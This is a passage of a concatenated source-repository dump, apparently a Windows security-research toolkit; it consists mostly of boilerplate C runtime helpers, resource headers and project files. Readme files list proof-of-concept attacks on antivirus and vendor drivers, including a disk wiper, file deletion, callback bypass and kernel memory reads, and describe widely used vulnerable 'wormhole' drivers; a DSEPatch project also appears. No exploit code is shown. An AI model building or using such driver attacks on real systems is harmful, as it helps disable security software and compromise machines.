15 |
16 | size_t _strlen_w(const wchar_t *s)
17 | {
18 | wchar_t *s0 = (wchar_t *)s;
19 |
20 | if ( s==0 )
21 | return 0;
22 |
23 | while ( *s!=0 )
24 | s++;
25 |
26 | return (s-s0);
27 | }
28 |
--------------------------------------------------------------------------------
/source/NtCall64_LogParser/NtCall64_LogParser.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | c:\makeexe\ntcall64.log
5 | WindowsLocalDebugger
6 |
7 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/minirtl/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t _strlen_a(const char *s)
4 | {
5 | char *s0 = (char *)s;
6 |
7 | if ( s==0 )
8 | return 0;
9 |
10 | while ( *s!=0 )
11 | s++;
12 |
13 | return (s-s0);
14 | }
15 |
16 | size_t _strlen_w(const wchar_t *s)
17 | {
18 | wchar_t *s0 = (wchar_t *)s;
19 |
20 | if ( s==0 )
21 | return 0;
22 |
23 | while ( *s!=0 )
24 | s++;
25 |
26 | return (s-s0);
27 | }
28 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Implementation of DllMain.
2 |
3 | #include "stdafx.h"
4 | #include "resource.h"
5 | #include "AmsiScan_i.h"
6 | #include "dllmain.h"
7 |
8 | CAmsiScanModule _AtlModule;
9 |
10 | // DLL Entry Point
11 | extern "C" BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
12 | {
13 | hInstance;
14 | return _AtlModule.DllMain(dwReason, lpReserved);
15 | }
16 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/srvany2.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | C:\new\zoomit.exe "-win32k -sc 1024 -pc 1024 logn"
5 | WindowsLocalDebugger
6 |
7 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strlen.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | size_t _strlen_a(const char *s)
4 | {
5 | char *s0 = (char *)s;
6 |
7 | if ( s==0 )
8 | return 0;
9 |
10 | while ( *s!=0 )
11 | s++;
12 |
13 | return (s-s0);
14 | }
15 |
16 | size_t _strlen_w(const wchar_t *s)
17 | {
18 | wchar_t *s0 = (wchar_t *)s;
19 |
20 | if ( s==0 )
21 | return 0;
22 |
23 | while ( *s!=0 )
24 | s++;
25 |
26 | return (s-s0);
27 | }
28 |
--------------------------------------------------------------------------------
/source/ROS/win32u/win32u/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by ver.rc
4 |
5 | // Next default values for new objects
6 | //
7 | #ifdef APSTUDIO_INVOKED
8 | #ifndef APSTUDIO_READONLY_SYMBOLS
9 | #define _APS_NEXT_RESOURCE_VALUE 101
10 | #define _APS_NEXT_COMMAND_VALUE 40001
11 | #define _APS_NEXT_CONTROL_VALUE 1001
12 | #define _APS_NEXT_SYMED_VALUE 101
13 | #endif
14 | #endif
15 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by resource.rc
4 |
5 | // Next default values for new objects
6 | //
7 | #ifdef APSTUDIO_INVOKED
8 | #ifndef APSTUDIO_READONLY_SYMBOLS
9 | #define _APS_NEXT_RESOURCE_VALUE 101
10 | #define _APS_NEXT_COMMAND_VALUE 40001
11 | #define _APS_NEXT_CONTROL_VALUE 1001
12 | #define _APS_NEXT_SYMED_VALUE 101
13 | #endif
14 | #endif
15 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/DumpPhys.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/DumpPort.manifest:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
--------------------------------------------------------------------------------
/source/IntelNal/Makefile:
--------------------------------------------------------------------------------
1 | iqvandroid-objs := \
2 | src/linuxnaldriver.o \
3 | src/linuxdriverpci_i.o \
4 | src/linuxdriveros_i.o \
5 | src/linuxdriverdevice_i.o \
6 | src/nalioctldrv.o
7 |
8 | EXTRA_CFLAGS := \
9 | -DNAL_LINUX -DNAL_LINUX_ANDROID -DNAL_DRIVER -DLINUX -D__KERNEL__ -DMODULE \
10 | -Idrivers/external_drivers/drivers/misc/iqvandroid/inc/ \
11 | -Idrivers/external_drivers/drivers/misc/iqvandroid/inc/linux \
12 |
13 | obj-$(CONFIG_INTEL_IQVANDROID) = iqvandroid.o
14 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/stdafx.cpp:
--------------------------------------------------------------------------------
1 | //-----------------------------------------------------------------------------
2 | // Author : hiyohiyo
3 | // Mail : hiyohiyo@crystalmark.info
4 | // Web : http://openlibsys.org/
5 | // License : The modified BSD license
6 | //
7 | // Copyright 2007 OpenLibSys.org. All rights reserved.
8 | //-----------------------------------------------------------------------------
9 |
10 | #include "stdafx.h"
11 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/INPOUT/SOURCES:
--------------------------------------------------------------------------------
1 | #
2 | # setup visualC++ source browsing
3 | #
4 | BSCMAKE_FLAGS=$(BSCMAKE_FLAGS) -n
5 |
6 |
7 |
8 | !if $(AMD64)
9 | ! message BUILDMSG: Info : Building amd64 Inpoutx64.sys
10 | TARGETNAME=inpoutx64
11 | !else
12 | !message BUILDMSG: Info : Building i386 Inpout32.sys
13 | TARGETNAME=inpout32
14 | !endif
15 |
16 | _NT_TARGET_VERSION = 0x0500
17 | TARGETPATH=obj
18 | TARGETTYPE=DRIVER
19 | INCLUDES=..\
20 |
21 | SOURCES=hwinterfacedrv.c hwinterfacedrv.rc
22 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/.gitignore:
--------------------------------------------------------------------------------
1 | # Prerequisites
2 | *.d
3 |
4 | # Compiled Object files
5 | *.slo
6 | *.lo
7 | *.o
8 | *.obj
9 |
10 | # Precompiled Headers
11 | *.gch
12 | *.pch
13 |
14 | # Compiled Dynamic libraries
15 | *.so
16 | *.dylib
17 | *.dll
18 |
19 | # Fortran module files
20 | *.mod
21 | *.smod
22 |
23 | # Compiled Static libraries
24 | *.lai
25 | *.la
26 | *.a
27 | *.lib
28 |
29 | # Executables
30 | *.exe
31 | *.out
32 | *.app
33 |
34 | # Ignore vscode files
35 | .vscode
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by OlsDll.rc
4 | //
5 |
6 | // Next default values for new objects
7 | //
8 | #ifdef APSTUDIO_INVOKED
9 | #ifndef APSTUDIO_READONLY_SYMBOLS
10 | #define _APS_NEXT_RESOURCE_VALUE 101
11 | #define _APS_NEXT_COMMAND_VALUE 40001
12 | #define _APS_NEXT_CONTROL_VALUE 1001
13 | #define _APS_NEXT_SYMED_VALUE 101
14 | #endif
15 | #endif
16 |
--------------------------------------------------------------------------------
/source/DrvTools/src/DrvTools.lpr:
--------------------------------------------------------------------------------
1 | program DrvTools;
2 |
3 | {$mode objfpc}{$H+}
4 |
5 | uses
6 | {$IFDEF UNIX}{$IFDEF UseCThreads}
7 | cthreads,
8 | {$ENDIF}{$ENDIF}
9 | Interfaces, // this includes the LCL widgetset
10 | Forms, Unit1, scmsup, nativesup;
11 |
12 | {$R *.res}
13 |
14 | begin
15 | RequireDerivedFormResource:=True;
16 | Application.Scaled:=True;
17 | Application.Initialize;
18 | Application.CreateForm(TMainForm, MainForm);
19 | Application.Run;
20 | end.
21 |
22 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Source/Dll/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Developer Studio generated include file.
3 | // Used by WinIo.rc
4 | //
5 |
6 | // Next default values for new objects
7 | //
8 | #ifdef APSTUDIO_INVOKED
9 | #ifndef APSTUDIO_READONLY_SYMBOLS
10 | #define _APS_NEXT_RESOURCE_VALUE 101
11 | #define _APS_NEXT_COMMAND_VALUE 40001
12 | #define _APS_NEXT_CONTROL_VALUE 1000
13 | #define _APS_NEXT_SYMED_VALUE 101
14 | #endif
15 | #endif
16 |
--------------------------------------------------------------------------------
/source/wdextract/README.md:
--------------------------------------------------------------------------------
1 |
2 | # wdextract
3 | ## Extract Windows Defender database from vdm files and unpack it
4 |
5 | Based on original PowerShell script https://gist.github.com/mattifestation/3af5a472e11b7e135273e71cb5fed866
6 |
7 | Rewrote to C++ because it is much faster than any script.
8 |
9 | ### Usage wdextract "vdm filename"
10 |
11 | + This program distributed as-is;
12 | + Uses ZLIB Data Compression Library (https://github.com/madler/zlib);
13 | + Built with MSVC 2017 with SDK 17763.
14 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/global.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | #if defined (_MSC_VER)
4 | #if (_MSC_VER >= 1900) //VS15, 17 etc
5 | #ifdef _DEBUG
6 | #pragma comment(lib, "vcruntimed.lib")
7 | #pragma comment(lib, "ucrtd.lib")
8 | #else
9 | #pragma comment(lib, "libucrt.lib")
10 | #pragma comment(lib, "libvcruntime.lib")
11 | #endif
12 | #endif
13 | #endif
14 |
15 | #include
16 | #include
17 | #include "minirtl/minirtl.h"
18 |
19 | extern HMODULE g_currentModule;
20 | extern LONG g_cRefDll;
21 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/readme.txt:
--------------------------------------------------------------------------------
1 | Collection of "wormhole" open source drivers widely used by hardware vendors sometimes in unmodified state.
2 |
3 | MAPMEM - NTDDK 3.51 example from 1993, multiple usage, noticable usage by Gigabyte, SuperMicro
4 | PHYMEM - by akui, multiple usage, noticable usage by Realtek, SuperMicro
5 | WINIO - by Yariv Kaplan, multiple usage, ENETECH I/O drivers main source of inspiration
6 | WINRING0 - by hiyohiyo, multiple usage, literally everywhere
7 | INPOUT - by Phillip Gibbon, based on hwinterface by Logix4U.
8 |
9 | (c) drivers authors
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/AmsiProvider.rgs:
--------------------------------------------------------------------------------
1 | HKCR
2 | {
3 | NoRemove CLSID
4 | {
5 | ForceRemove {1c0643e1-5b0a-4420-9b76-0de9264b4c59} = s 'AmsiProvider'
6 | {
7 | ForceRemove Programmable
8 | InprocServer32 = s '%MODULE%'
9 | {
10 | val ThreadingModel = s 'Both'
11 | }
12 | }
13 | }
14 | }
15 |
16 | HKLM
17 | {
18 | NoRemove SOFTWARE {
19 | NoRemove Microsoft {
20 | NoRemove AMSI {
21 | NoRemove Providers {
22 | ForceRemove {1c0643e1-5b0a-4420-9b76-0de9264b4c59} = s 'AmsiProvider'
23 | }
24 | }
25 | }
26 | }
27 | }
28 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPhys/DumpPhys/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Windows.Forms;
4 |
5 | namespace DumpPhys
6 | {
7 | static class Program
8 | {
9 | ///
10 | /// The main entry point for the application.
11 | ///
12 | [STAThread]
13 | static void Main()
14 | {
15 | Application.EnableVisualStyles();
16 | Application.SetCompatibleTextRenderingDefault(false);
17 | Application.Run(new Form1());
18 | }
19 | }
20 | }
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINIO/Samples/DumpPort/DumpPort/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Windows.Forms;
4 |
5 | namespace DumpPort
6 | {
7 | static class Program
8 | {
9 | ///
10 | /// The main entry point for the application.
11 | ///
12 | [STAThread]
13 | static void Main()
14 | {
15 | Application.EnableVisualStyles();
16 | Application.SetCompatibleTextRenderingDefault(false);
17 | Application.Run(new Form1());
18 | }
19 | }
20 | }
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by AmsiScan.rc
4 | //
5 | #define IDS_PROJNAME 100
6 | #define IDR_AMSISCAN 101
7 | #define IDR_AMSIPROVIDER 106
8 |
9 | // Next default values for new objects
10 | //
11 | #ifdef APSTUDIO_INVOKED
12 | #ifndef APSTUDIO_READONLY_SYMBOLS
13 | #define _APS_NEXT_RESOURCE_VALUE 201
14 | #define _APS_NEXT_COMMAND_VALUE 32768
15 | #define _APS_NEXT_CONTROL_VALUE 201
16 | #define _APS_NEXT_SYMED_VALUE 107
17 | #endif
18 | #endif
19 |
--------------------------------------------------------------------------------
/source/SecTrash/readme.txt:
--------------------------------------------------------------------------------
1 | secureaplus.c - SecureAPlus AV SAScan driver Denial of Service
2 | iobitcallbacks.c - IObit Malware Fighter ImfObCallback.sys bypass
3 | bkavsp.c - BKAVSP Arbitrary File Deletion
4 | superantispyware.c - SUPERAntispyware disk wiper
5 | maxproc64.c - MaxSecure MaxProc64 driver Denial of Service
6 | iobit_winring0.c - IOBit WinRing0 driver information disclosure
7 | asusgio2.c - ASUS GiveIO driver unlock
8 | logitech.c - Logitech LgCoreTemp.sys driver information disclosure
9 | enetech.c - EneTech driver arbitrary kernel memory read/information disclosure
10 | glckio2.c - Gigabyte glckio2 driver information disclosure/unlock
11 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strcat_a(char *dest, const char *src)
4 | {
5 | if ( (dest==0) || (src==0) )
6 | return dest;
7 |
8 | while ( *dest!=0 )
9 | dest++;
10 |
11 | while ( *src!=0 ) {
12 | *dest = *src;
13 | dest++;
14 | src++;
15 | }
16 |
17 | *dest = 0;
18 | return dest;
19 | }
20 |
21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
22 | {
23 | if ( (dest==0) || (src==0) )
24 | return dest;
25 |
26 | while ( *dest!=0 )
27 | dest++;
28 |
29 | while ( *src!=0 ) {
30 | *dest = *src;
31 | dest++;
32 | src++;
33 | }
34 |
35 | *dest = 0;
36 | return dest;
37 | }
38 |
--------------------------------------------------------------------------------
/source/StripDebug/minirtl/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strcat_a(char *dest, const char *src)
4 | {
5 | if ( (dest==0) || (src==0) )
6 | return dest;
7 |
8 | while ( *dest!=0 )
9 | dest++;
10 |
11 | while ( *src!=0 ) {
12 | *dest = *src;
13 | dest++;
14 | src++;
15 | }
16 |
17 | *dest = 0;
18 | return dest;
19 | }
20 |
21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
22 | {
23 | if ( (dest==0) || (src==0) )
24 | return dest;
25 |
26 | while ( *dest!=0 )
27 | dest++;
28 |
29 | while ( *src!=0 ) {
30 | *dest = *src;
31 | dest++;
32 | src++;
33 | }
34 |
35 | *dest = 0;
36 | return dest;
37 | }
38 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/DSEPatch.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 | WindowsLocalDebugger
7 |
8 |
9 | -r
10 | WindowsLocalDebugger
11 |
12 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strcat_a(char *dest, const char *src)
4 | {
5 | if ( (dest==0) || (src==0) )
6 | return dest;
7 |
8 | while ( *dest!=0 )
9 | dest++;
10 |
11 | while ( *src!=0 ) {
12 | *dest = *src;
13 | dest++;
14 | src++;
15 | }
16 |
17 | *dest = 0;
18 | return dest;
19 | }
20 |
21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
22 | {
23 | if ( (dest==0) || (src==0) )
24 | return dest;
25 |
26 | while ( *dest!=0 )
27 | dest++;
28 |
29 | while ( *src!=0 ) {
30 | *dest = *src;
31 | dest++;
32 | src++;
33 | }
34 |
35 | *dest = 0;
36 | return dest;
37 | }
38 |
--------------------------------------------------------------------------------
/source/DrvTools/src/ppas.bat:
--------------------------------------------------------------------------------
1 | @echo off
2 | SET THEFILE=C:\Work\DrvTools\DrvTools32.exe
3 | echo Linking %THEFILE%
4 | C:\lazarus\fpc\3.2.0\bin\x86_64-win64\ld.exe -b pei-i386 -m i386pe --gc-sections -s --subsystem windows --entry=_WinMainCRTStartup -o C:\Work\DrvTools\DrvTools32.exe C:\Work\DrvTools\link.res
5 | if errorlevel 1 goto linkend
6 | C:\lazarus\fpc\3.2.0\bin\x86_64-win64\postw32.exe --subsystem gui --input C:\Work\DrvTools\DrvTools32.exe --stack 16777216
7 | if errorlevel 1 goto linkend
8 | goto end
9 | :asmend
10 | echo An error occurred while assembling %THEFILE%
11 | goto end
12 | :linkend
13 | echo An error occurred while linking %THEFILE%
14 | :end
15 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/minirtl/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strcat_a(char *dest, const char *src)
4 | {
5 | if ( (dest==0) || (src==0) )
6 | return dest;
7 |
8 | while ( *dest!=0 )
9 | dest++;
10 |
11 | while ( *src!=0 ) {
12 | *dest = *src;
13 | dest++;
14 | src++;
15 | }
16 |
17 | *dest = 0;
18 | return dest;
19 | }
20 |
21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
22 | {
23 | if ( (dest==0) || (src==0) )
24 | return dest;
25 |
26 | while ( *dest!=0 )
27 | dest++;
28 |
29 | while ( *src!=0 ) {
30 | *dest = *src;
31 | dest++;
32 | src++;
33 | }
34 |
35 | *dest = 0;
36 | return dest;
37 | }
38 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/test/test.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "test"=.\test.dsp - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PCIFlt/PCIFlt.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "PCIFlt"=.\PCIFlt.dsp - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/pmdll/pmdll.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "pmdll"=.\pmdll.dsp - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strcat.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strcat_a(char *dest, const char *src)
4 | {
5 | if ( (dest==0) || (src==0) )
6 | return dest;
7 |
8 | while ( *dest!=0 )
9 | dest++;
10 |
11 | while ( *src!=0 ) {
12 | *dest = *src;
13 | dest++;
14 | src++;
15 | }
16 |
17 | *dest = 0;
18 | return dest;
19 | }
20 |
21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src)
22 | {
23 | if ( (dest==0) || (src==0) )
24 | return dest;
25 |
26 | while ( *dest!=0 )
27 | dest++;
28 |
29 | while ( *src!=0 ) {
30 | *dest = *src;
31 | dest++;
32 | src++;
33 | }
34 |
35 | *dest = 0;
36 | return dest;
37 | }
38 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/PHYMEM/PhyMem/driver/phymem.dsw:
--------------------------------------------------------------------------------
1 | Microsoft Developer Studio Workspace File, Format Version 6.00
2 | # WARNING: DO NOT EDIT OR DELETE THIS WORKSPACE FILE!
3 |
4 | ###############################################################################
5 |
6 | Project: "phymem"=.\phymem.dsp - Package Owner=<4>
7 |
8 | Package=<5>
9 | {{{
10 | }}}
11 |
12 | Package=<4>
13 | {{{
14 | }}}
15 |
16 | ###############################################################################
17 |
18 | Global:
19 |
20 | Package=<5>
21 | {{{
22 | }}}
23 |
24 | Package=<3>
25 | {{{
26 | }}}
27 |
28 | ###############################################################################
29 |
30 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiServer/AmsiScan/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently,
3 | // but are changed infrequently
4 |
5 | #pragma once
6 |
7 | #ifndef STRICT
8 | #define STRICT
9 | #endif
10 |
11 | #include "targetver.h"
12 |
13 | #define _ATL_APARTMENT_THREADED
14 |
15 | #define _ATL_NO_AUTOMATIC_NAMESPACE
16 |
17 | #define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // some CString constructors will be explicit
18 |
19 |
20 | #define ATL_NO_ASSERT_ON_DESTROY_NONEXISTENT_WINDOW
21 |
22 | #include "resource.h"
23 | #include
24 | #include
25 | #include
26 |
--------------------------------------------------------------------------------
/source/wdextract/wdextract/pch.h:
--------------------------------------------------------------------------------
1 | // Tips for Getting Started:
2 | // 1. Use the Solution Explorer window to add/manage files
3 | // 2. Use the Team Explorer window to connect to source control
4 | // 3. Use the Output window to see build output and other messages
5 | // 4. Use the Error List window to view errors
6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file
8 |
9 | #ifndef PCH_H
10 | #define PCH_H
11 |
12 | // TODO: add headers that you want to pre-compile here
13 |
14 | #endif //PCH_H
15 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderATL/AmsiClient/pch.h:
--------------------------------------------------------------------------------
1 | // Tips for Getting Started:
2 | // 1. Use the Solution Explorer window to add/manage files
3 | // 2. Use the Team Explorer window to connect to source control
4 | // 3. Use the Output window to see build output and other messages
5 | // 4. Use the Error List window to view errors
6 | // 5. Go to Project > Add New Item to create new code files, or Project > Add Existing Item to add existing code files to the project
7 | // 6. In the future, to open this project again, go to File > Open > Project and select the .sln file
8 |
9 | #ifndef PCH_H
10 | #define PCH_H
11 |
12 | // TODO: add headers that you want to pre-compile here
13 |
14 | #endif //PCH_H
15 |
--------------------------------------------------------------------------------
/source/WormholeDrivers/WINRING0/dll/Driver.h:
--------------------------------------------------------------------------------
1 | //-----------------------------------------------------------------------------
2 | // Author : hiyohiyo
3 | // Mail : hiyohiyo@crystalmark.info
4 | // Web : http://openlibsys.org/
5 | // License : The modified BSD license
6 | //
7 | // Copyright 2007 OpenLibSys.org. All rights reserved.
8 | //-----------------------------------------------------------------------------
9 |
10 | #pragma once
11 |
12 | #define OLS_DRIVER_INSTALL 1
13 | #define OLS_DRIVER_REMOVE 2
14 | #define OLS_DRIVER_SYSTEM_INSTALL 3
15 | #define OLS_DRIVER_SYSTEM_UNINSTALL 4
16 |
17 | BOOL ManageDriver(LPCTSTR DriverId, LPCTSTR DriverPath, USHORT Function);
--------------------------------------------------------------------------------
/source/ApiSetSchema/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Resource.rc
4 | //
5 | #define IDD_ASDIALOG 101
6 | #define IDI_ICON_MAIN 103
7 | #define IDC_SEARCH_EDIT 1001
8 | #define IDC_SEARCH_BUTTON 1002
9 | #define IDC_ENTRY_EDIT 1003
10 |
11 | // Next default values for new objects
12 | //
13 | #ifdef APSTUDIO_INVOKED
14 | #ifndef APSTUDIO_READONLY_SYMBOLS
15 | #define _APS_NEXT_RESOURCE_VALUE 104
16 | #define _APS_NEXT_COMMAND_VALUE 40001
17 | #define _APS_NEXT_CONTROL_VALUE 1003
18 | #define _APS_NEXT_SYMED_VALUE 101
19 | #endif
20 | #endif
21 |
--------------------------------------------------------------------------------
/source/StripDebug/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strcpy_a(char *dest, const char *src)
4 | {
5 | char *p;
6 |
7 | if ( (dest==0) || (src==0) )
8 | return dest;
9 |
10 | if (dest == src)
11 | return dest;
12 |
13 | p = dest;
14 | while ( *src!=0 ) {
15 | *p = *src;
16 | p++;
17 | src++;
18 | }
19 |
20 | *p = 0;
21 | return dest;
22 | }
23 |
24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
25 | {
26 | wchar_t *p;
27 |
28 | if ((dest == 0) || (src == 0))
29 | return dest;
30 |
31 | if (dest == src)
32 | return dest;
33 |
34 | p = dest;
35 | while ( *src!=0 ) {
36 | *p = *src;
37 | p++;
38 | src++;
39 | }
40 |
41 | *p = 0;
42 | return dest;
43 | }
44 |
--------------------------------------------------------------------------------
/source/ApiSetSchema/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strcpy_a(char *dest, const char *src)
4 | {
5 | char *p;
6 |
7 | if ( (dest==0) || (src==0) )
8 | return dest;
9 |
10 | if (dest == src)
11 | return dest;
12 |
13 | p = dest;
14 | while ( *src!=0 ) {
15 | *p = *src;
16 | p++;
17 | src++;
18 | }
19 |
20 | *p = 0;
21 | return dest;
22 | }
23 |
24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
25 | {
26 | wchar_t *p;
27 |
28 | if ((dest == 0) || (src == 0))
29 | return dest;
30 |
31 | if (dest == src)
32 | return dest;
33 |
34 | p = dest;
35 | while ( *src!=0 ) {
36 | *p = *src;
37 | p++;
38 | src++;
39 | }
40 |
41 | *p = 0;
42 | return dest;
43 | }
44 |
--------------------------------------------------------------------------------
/source/StripDebug/StripDebug.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | C:\MAKEEXE\StripDebug\StripDebug\test.exe
5 | WindowsLocalDebugger
6 |
7 |
8 | C:\MAKEEXE\StripDebug\StripDebug\test.exe
9 | WindowsLocalDebugger
10 |
11 |
--------------------------------------------------------------------------------
/source/DSEPatch/DSEPatch/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strcpy_a(char *dest, const char *src)
4 | {
5 | char *p;
6 |
7 | if ( (dest==0) || (src==0) )
8 | return dest;
9 |
10 | if (dest == src)
11 | return dest;
12 |
13 | p = dest;
14 | while ( *src!=0 ) {
15 | *p = *src;
16 | p++;
17 | src++;
18 | }
19 |
20 | *p = 0;
21 | return dest;
22 | }
23 |
24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
25 | {
26 | wchar_t *p;
27 |
28 | if ((dest == 0) || (src == 0))
29 | return dest;
30 |
31 | if (dest == src)
32 | return dest;
33 |
34 | p = dest;
35 | while ( *src!=0 ) {
36 | *p = *src;
37 | p++;
38 | src++;
39 | }
40 |
41 | *p = 0;
42 | return dest;
43 | }
44 |
--------------------------------------------------------------------------------
/source/ROS/srvany2/srvany2/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strcpy_a(char *dest, const char *src)
4 | {
5 | char *p;
6 |
7 | if ( (dest==0) || (src==0) )
8 | return dest;
9 |
10 | if (dest == src)
11 | return dest;
12 |
13 | p = dest;
14 | while ( *src!=0 ) {
15 | *p = *src;
16 | p++;
17 | src++;
18 | }
19 |
20 | *p = 0;
21 | return dest;
22 | }
23 |
24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src)
25 | {
26 | wchar_t *p;
27 |
28 | if ((dest == 0) || (src == 0))
29 | return dest;
30 |
31 | if (dest == src)
32 | return dest;
33 |
34 | p = dest;
35 | while ( *src!=0 ) {
36 | *p = *src;
37 | p++;
38 | src++;
39 | }
40 |
41 | *p = 0;
42 | return dest;
43 | }
44 |
--------------------------------------------------------------------------------
/source/AMSI/AmsiProviderC/AmsiProviderServer/minirtl/_strcpy.c:
--------------------------------------------------------------------------------
1 | #include "rtltypes.h"
2 |
3 | char *_strcpy_a(char *dest, const char *src)
